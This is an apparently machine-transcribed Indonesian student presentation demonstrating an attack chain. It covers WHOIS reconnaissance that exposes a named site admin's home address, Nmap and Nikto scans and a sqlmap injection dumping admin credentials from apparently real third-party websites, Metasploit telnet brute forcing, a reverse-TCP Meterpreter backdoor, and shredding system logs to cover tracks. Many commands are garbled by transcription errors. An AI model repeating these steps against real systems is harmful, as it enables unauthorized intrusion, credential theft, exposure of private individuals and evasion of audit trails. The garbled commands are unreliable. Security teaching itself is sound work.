Assalamualaikum warahmatullahi wabarakatuh. Saya dari kelompok 7 akan mempresentasikan proyek akhir UAS, yaitu Network Security yang beranggotakan saya Iqtik Wahyudi dengan NIM 1913511134 yang membahas tentang reconing dan scanning. Saya Muhammad Rijal Ripai dengan NIM 1913511173 dengan membahas training. Saya Dini Wahyudi dengan NIM 1913511131 membahas mentoring akses sama covering track. Bismillahirrahmanirrahim. Perkenalkan, nama saya Iqtik Wahyudi dengan NIM 1913511134. Di sini saya akan mempraktikkan tentang reconing dan scanning. Pertama, kita masuk dulu ke Linux dan ketikkan dari hasil reconing menggunakan tools voice dengan target website rshava.com, terdapat informasi yang berkaitan dengan domain yang dijadikan target. Dengan informasi-informasi yang dapat dijadikan sebagai acuan untuk melakukan sebuah pengintaian pada suatu website. Dan di sini terlihat informasi nama domain dan ID domain yang digunakan. Dengan nama domain rshava.com dan ID domain 20 42 41 70 dan 74. Lalu domain_com strip prsn. Dan terdapat juga informasi berupa tempat hosting website tersebut, yaitu www.hostinger.com. Ada juga informasi berupa kapan itu dibuat dan diperbarui secara lanjut, terdapat semuanya. Nah, itu ada di update dan creation. Lalu di sini juga ada admin. Nah, nama adminnya ada Yohanes Krisdiana. Nah, di admin ini kita mengoperasikan website tersebut seperti informasi nama admin dan alamat rumah Jalan Ahmad Yani nomor 25 Pare, Kediri, Jawa Timur. Nah, kode posnya 64212. Lalu dari kota Kediri dan di sini juga terdapat nomor telepon, email, dan selanjutnya juga terdapat informasi yang berhubungan dengan name server, yaitu ns1.idhostinger.com. Yang kedua ada ns2, sama aja sih sampai 4. Lalu kita lanjut ke website Lalu kita masuk ke arsip sejarah website target. Di sini kita bisa lihat bahwa website www.rshva.com pertama kali berdiri sejak 2016 sampai 2002 sekarang. Jika kita klik di tahun 2016, kita dapat melihat informasi detailnya. Dapat kita lihat bahwa website www.rshva.com pertama kali dibuat pada tanggal 10 September. Nah, ini pertama kali websitenya dibuat pada tanggal 10 September di tahun 2016 hingga tahun 2002 sekarang. Dan di sini juga hasil dari Rodin menggunakan Open Visual. Lalu kita lanjut ke Open Visual Traceroute. Nah,
Di sini dari hasil Ronin menggunakan OpenPassword dengan kecepatan akses rata-rata 365. Di sini bisa dilihat terdapat 19 hop, dimulai dari hop pertama dengan lokasi Indonesia dengan IP address 192, 168, 194 dan 192. Nah, setelahnya sambungan mengalami RTO di hop kedua karena tidak adanya respon yang disebabkan beberapa faktor. Contohnya tabrakan jaringan atau overload traffic pada jaringan setelah RTO sambungan. Pada jaringan setelah RTO, sambungan 3 terhubung lagi ke hop 3 dengan IP address 10.195.178.1 dan hop 19 yang merupakan sentralnya yang berlokasi di Singapura dengan IP address 151.106.124.164. Lalu di sini saya lanjut ke tahap scanning, baik lagi ke Kali Linux ya. Di sini saya menggunakan tools and map. Lalu lanjut ke tahap scanning. Di sini saya menggunakan tools and map. Nmap -sp komputermedan.com. Di sini agak lama ya loading. Memang agak lama ya loadingnya. Di sini kita mendapatkan informasi dengan menggunakan tools and map berupa beberapa port. Yang pertama ada port 21, state-nya open, service-nya FTP dan versinya pure FTP-D. Lalu lanjut ke tools Nikto Mina komputermedan.com -p80. Nah, dari tools ini kita mendapatkan informasi berupa target IP, target hostname, target port, dan menggunakan server Apache. Pertama ada target IP 103.229.73.124 dan hostname-nya di sini komputermedan.com. Target portnya ada 80. Lalu kita lanjut ke websitenya. Website netcraft, lalu pilih resource, pilih site report. Nah, sini agak menunggu ya lama karena jaringannya kurang bagus. Lalu ketikkan www.komputermedan.com, lalu enter. Di sini saya mendapatkan beberapa informasi berupa domain, name server, IP address, sama IP AS. Pertama domainnya komputermedan.com, name servernya dns1.masterweb.com. Lalu ada IP addressnya 103.229.73.124. Lalu ada IP AS
A-AS55660. Nah, paling segitu yang bisa saya sampaikan. Terima kasih, mohon kurangnya mohon dimaafkan. Assalamualaikum warahmatullahi wabarakatuh. Assalamualaikum warahmatullahi wabarakatuh. Di sini saya Muhammad Rijari Pai dengan NIM 1913511173. Di sini saya akan menjelaskan gaining access. Pertama, teknik serangan yang saya gunakan adalah SQL injection dengan tool SQL map. Pertama, kita lihat web yang akan kita serang terlebih dahulu, lalu kopikan linknya, kemudian kita buka terminalnya, lalu kita ketikkan SQL menu, kopikan link website yang akan kita serang tadi, kemudian diikuti dengan min-dbs, lalu kita enter. Nah, di sini terlihat ada dua database. Yang pertama ada Glamour PPC _new. Database yang kedua information _schema. Kemudian kita ketikkan SQL map menu diikuti dengan link yang akan kita serang, terus min d, lalu masukkan database yang akan kita serang, lalu diikuti dengan table, kita enter. Nah, di dalam database yang tadi kita buka terdapat 19 tabel, dan kita akan membuka yang user admin ini. Nah, ini ya. Lalu kita ketikkan menu, lalu link yang tadi diikuti dengan min d, masukkan database, terus min t, nah diikuti dengan tabel yang kita akan serang, yaitu user admin, lalu min dam, lalu kita enter saja. Di sini kita melihat ada beberapa informasi seperti user admin ID, username, user email, user phone, user aktif, dan ada user detail dan user password. Baik, sekian, terima kasih. Baik, di sini saya akan menerangkan tahapan yang kedua, yaitu gaining access dengan teknik serangan brute force, username dan password menggunakan tools Metasploit. Pertama-tama kita buka Ubuntu server ya, lalu ketikkan ifconfig. Nah, ini IP yang akan kita gunakan kali ini. Lalu kita kembali ke Kali Linux, ketikkan msp console, enter. Kita tunggu terlebih dahulu. Kita tunggu sebentar.
Nah, lalu ketikkan use auxiliary /scanner /telnet login /telnet_login, lalu enter. Nah, ini sudah masuk ya. Kita lihat dulu, bisa show option. Nah, di sini kita ketikkan set user underscore file desktop / username .txt, enter. Set pass underscore file desktop password.txt, lalu enter. Pembuatan word list bisa menggunakan tools crunch atau lain sebagainya. Lalu kita ketikkan set stop underscore on underscore sukses, true, lalu enter. Lalu ketikkan set host 192.168. Kita lihat lagi IP-nya 192.168.185.169. 185.169, enter. Langsung ketik run. Tunggu hingga proses SMW ini sampai selesai. Di sini nah, ini lagi proses ya. Di sini terlihat keterangan login sukses dengan username telnetnya Rizal dengan password Al-Muhajirin ya. Kita tunggu sampai selesai. Lalu kita ketikkan telnet 192.168.185.169, lalu enter. Memasukkan username-nya Rizal, passwordnya Al-Muhajirin.
Kemudian kita ketik ls. Di sini terlihat folder Ubuntu servernya, yang berarti kita sudah masuk ke direktori Ubuntu server. Baik, cukup sekian dari saya. Terima kasih. Mohon maaf bila ada kesalahan. Wassalamualaikum warahmatullahi wabarakatuh. Oke, selanjutnya saya Denny Wahyudi dengan NIM 1913131 akan mempraktekkan tentang maintaining access. Pertama-tama kita ketikkan sudoku untuk masuk ke root Linux. Sudah masuk, kita masukkan msf phenom inv window /meterpreter/reverse tcp lhost dengan IP 192.168.95.81 dan lportnya 12345. minf x min-o backdoor untuk namanya backdoor.exit, dan kemudian akan tampilan muncul seperti ini, no platform was selected. Kemudian untuk masukkan msf console, dan ini hasilnya. Ini hasil dari msf console. Terus kita masukkan use exploit /multi/handler dan nampil kayak gini. Terus kita klikkan show option untuk melihat, dan tampilan show option seperti ini yang ada di layar. File option seperti nama dan lhost, dan masukkan IP yang tadi, terus importnya 12345. Kemudian masukkan set lhost dengan IP 192.168.95.81 dan masukkan juga set lport yang dimana ada 1, 2, 3, 4, 5. Setelah masukkan itu, terus masukkan set payload dengan window /meterpreter/reverse.cv. Kemudian setelah itu temukan dengan show option seperti ini. Terus bisa dicek dengan exploit. Setelah itu masukkan exploit dan akan muncul tampilan seperti ini yang diinginkan. Terus yang terakhir sys info, dan ini hasilnya. Baik, di sini saya akan melanjutkan covering tracks. Saya akan memperhatikan tentang covering tracks. Pertama-tama kita masukkan cd/var/log, kemudian akan tampil tampilan seperti ini: alternatif log, bot log, dpkg log, terus banyak. Ini kayak gini tampilan. Cara untuk menghapusnya, kita masukkan thread min zx uvf outlog. Sudah diklik, terus tekan enter, kemudian akan muncul tampilan seperti ini, dan kita langsung cek dengan masukkan ls, dan di sini sudah terhapus tentang outlog. Dan kemudian kita juga akan menghapus tentang cranlog. Kita masukkan lagi thread min zx uvf dan keterangannya cranlog, dan muncul tampilan seperti ini. Dan kita akan mengeceknya apakah itu sudah terhapus. Kita ketikkan ls, dan di sini sudah terhapus tampilan cranlog. Mungkin sekian penjelasan dari kelompok kami. Mohon maaf apabila banyak kesalahan. Wabillahi taufiq wal hidayah. Wassalamualaikum warahmatullahi wabarakatuh.